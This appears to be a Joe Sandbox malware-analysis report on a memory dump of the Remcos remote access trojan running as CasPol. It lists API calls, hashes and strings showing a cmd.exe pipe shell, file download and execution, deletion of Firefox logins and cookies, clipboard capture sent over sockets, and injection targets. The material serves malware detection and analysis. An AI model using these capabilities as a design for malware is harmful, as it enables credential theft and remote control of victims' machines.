                                                                                                            • Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
                                                                                                            • Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
                                                                                                            • Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1214 41246e-41248d RegOpenKeyExA 1215 4124b2 1214->1215 1216 41248f-4124ac RegQueryValueExA RegCloseKey 1214->1216 1218 4124b4-4124b6 1215->1218 1216->1215 1217 4124ae-4124b0 1216->1217 1217->1218
                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
                                                                                                            • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,0040B996,004660E0), ref: 004124A4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 3677997916-0
                                                                                                            • Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
                                                                                                            • Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
                                                                                                            • Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: xAG
                                                                                                            • API String ID: 176396367-2759412365
                                                                                                            • Opcode ID: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                            • Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
                                                                                                            • Opcode Fuzzy Hash: 67b639f6f502bf991f83ab0ee8fabe8b44a35461e942d099586b23cecd669b62
                                                                                                            • Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
                                                                                                            APIs
                                                                                                            • _free.LIBCMT ref: 0044B9DF
                                                                                                              • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            • RtlReAllocateHeap.NTDLL(00000000,00475D30,?,00000004,00000000,?,0044E90A,00475D30,00000004,?,00475D30,?,?,00443125,00475D30,?), ref: 0044BA1B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap$_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1482568997-0
                                                                                                            • Opcode ID: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                                                            • Instruction ID: 12956794463f81a5c067cbc08b9f94d22fea268b9007f3edb04f63306941b305
                                                                                                            • Opcode Fuzzy Hash: 562d4c1fddf21a80c38cfe2e0300bdc28a7a71d666f3b820161c9f5a7c2f7eb0
                                                                                                            • Instruction Fuzzy Hash: D6F0F67210051167FF212A27AC01B6B2B2CDFC27B1F15012BFA18AA292DF6CCC0191EE
                                                                                                            APIs
                                                                                                            • socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                                              • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateEventStartupsocket
                                                                                                            • String ID:
                                                                                                            • API String ID: 1953588214-0
                                                                                                            • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                            • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                            • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                            APIs
                                                                                                            • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                            • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                              • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                              • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                              • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                              • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                            • String ID:
                                                                                                            • API String ID: 1170566393-0
                                                                                                            • Opcode ID: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction ID: 9c65b6197a0e8ce5e429e224625e4c370c9a1848c9e97f9a588a6d75e163472b
                                                                                                            • Opcode Fuzzy Hash: de7c912f5844d1f7c2d429620844517faabbfd26de99632591fe9930316e04d8
                                                                                                            • Instruction Fuzzy Hash: 4ED05B326406216FB310575D6D01FFBB5DCDFA67617150077F408D7110D6945D82C3AD
                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
                                                                                                            • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                            • Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
                                                                                                            APIs
                                                                                                            • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Startup
                                                                                                            • String ID:
                                                                                                            • API String ID: 724789610-0
                                                                                                            • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                            • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                            • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: recv
                                                                                                            • String ID:
                                                                                                            • API String ID: 1507349165-0
                                                                                                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: send
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809346765-0
                                                                                                            • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                            • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                            • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                            APIs
                                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                            • API String ID: 2918587301-599666313
                                                                                                            • Opcode ID: 9f2cd6a3d13f6cb2b06b8496575b7c5252782f8eaeba4f4dea789b5e1a27efcd
                                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                                            • Opcode Fuzzy Hash: 9f2cd6a3d13f6cb2b06b8496575b7c5252782f8eaeba4f4dea789b5e1a27efcd
                                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                                            APIs
                                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                                            • API String ID: 3815868655-81343324
                                                                                                            • Opcode ID: a327936dd0592c9695a0c2778442a59709dd3e77499e6f7e66c7972828f539dd
                                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                                            • Opcode Fuzzy Hash: a327936dd0592c9695a0c2778442a59709dd3e77499e6f7e66c7972828f539dd
                                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                                            APIs
                                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                            • API String ID: 65172268-860466531
                                                                                                            • Opcode ID: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                                            • Opcode Fuzzy Hash: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$CloseFile$FirstNext
                                                                                                            • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                                                            • API String ID: 1164774033-3681987949
                                                                                                            • Opcode ID: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                                                            • Instruction ID: 89bba1744b34cafda07904381260291e44814ca984bf7dbd554ee600cd7873bd
                                                                                                            • Opcode Fuzzy Hash: 2316961ae5f52f31cc477e1d09f773a4a7350a98b7632d2531bc2c7add8855b4
                                                                                                            • Instruction Fuzzy Hash: 4D512C319042195ADB14FBA1EC96AEE7768EF50318F50007FF805B31E2EF389A45CA9D
                                                                                                            APIs
                                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B5CC
                                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6B2
                                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B6D1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Find$Close$File$FirstNext
                                                                                                            • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                                                            • API String ID: 3527384056-432212279
                                                                                                            • Opcode ID: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                                                            • Instruction ID: 41d59f58487c11b5b23c2ebc8e3123b77d6604a8f5f59a85184e8f88ff1ca84c
                                                                                                            • Opcode Fuzzy Hash: 6413a42ae19e7c89ed42c643cb52caeedd1e1ba2e9febfa8c5afa48b91d55771
                                                                                                            • Instruction Fuzzy Hash: 65413A319042196ACB14F7A1EC569EE7768EE21318F50017FF801B31E2EF399A458A9E
                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
                                                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                              • Part of subcall function 004127D5: RegCloseKey.KERNELBASE(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                            • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                            • API String ID: 726551946-3025026198
                                                                                                            • Opcode ID: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                                                            • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                            • Opcode Fuzzy Hash: 72761ffefe35e3790d33003bddd1b3aca3f5aeffe8a7e6c700e9af830a7ff8c7
                                                                                                            • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                            APIs
                                                                                                            • OpenClipboard.USER32 ref: 004159C7
                                                                                                            • EmptyClipboard.USER32 ref: 004159D5
                                                                                                            • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                            • CloseClipboard.USER32 ref: 00415A5A
                                                                                                            • OpenClipboard.USER32 ref: 00415A61
                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                            • CloseClipboard.USER32 ref: 00415A89
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                            • String ID:
                                                                                                            • API String ID: 3520204547-0
                                                                                                            • Opcode ID: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                                                            • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                            • Opcode Fuzzy Hash: 8a84b0237ca338e1a3ed05f80deb3638e9beb60abd9708b2ae7a1dceee0212da
                                                                                                            • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                            Strings
                                                                                                            Memory Dump Source
